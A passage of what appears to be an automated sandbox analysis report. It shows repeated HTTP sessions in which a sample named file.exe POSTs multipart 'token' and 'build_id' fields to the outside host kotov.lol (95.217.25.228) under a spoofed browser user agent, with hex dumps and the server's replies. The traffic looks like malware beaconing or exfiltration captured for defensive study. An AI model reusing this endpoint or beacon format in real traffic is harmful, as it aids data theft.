2024-11-29 11:28:45 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 4b 4a 45 43 41 4b 45 48 4a 4a 4a 44 42 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------EBFBKKJECAKEHJJJDBAFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------EBFBKKJECAKEHJJJDBAFCont
2024-11-29 11:28:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	49864	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:47 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:47 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------CGIJJKEHCAKEGCAKJKECCont
2024-11-29 11:28:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	49865	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:48 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:48 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------FHCAFIDBKEBFCBFIIIIICont
2024-11-29 11:28:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	49866	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:50 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJEBKECBAKFBGDGCBGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:50 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------GIJEBKECBAKFBGDGCBGDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GIJEBKECBAKFBGDGCBGDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GIJEBKECBAKFBGDGCBGDCont
2024-11-29 11:28:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	49867	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:51 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:51 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------CGHCFBAAAFHJDGCBFIIJCont
2024-11-29 11:28:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	49868	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:53 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:53 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AKKEHIECFCAAFIEBGIDACont
2024-11-29 11:28:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	49869	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:54 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:54 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------CFHDBFIEGIDGIECBKJECCont
2024-11-29 11:28:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	49871	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:56 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:56 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------AKKKFBGDHJKFHJJJJDGCCont
2024-11-29 11:28:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	49872	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:57 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:57 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------JJKEBGHJKFIDGCAAFCAFCont
2024-11-29 11:28:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	49873	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:59 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:59 UTC	1841	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------CBAFIDAECBGCBFHJEBGDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------CBAFIDAECBGCBFHJEBGDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------CBAFIDAECBGCBFHJEBGDCont
2024-11-29 11:29:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	49875	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:00 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1829 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:00 UTC	1829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 42 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------CBAFIDAECBGCBFHJEBGDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------CBAFIDAECBGCBFHJEBGDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------CBAFIDAECBGCBFHJEBGDCont
2024-11-29 11:29:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	49876	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:02 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:29:02 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BAKEBAFIIECBGCAAAAFCCont
2024-11-29 11:29:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:29:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	49877	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:29:03 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 1841 Connection: Keep-Alive Cache-Control: no-cache
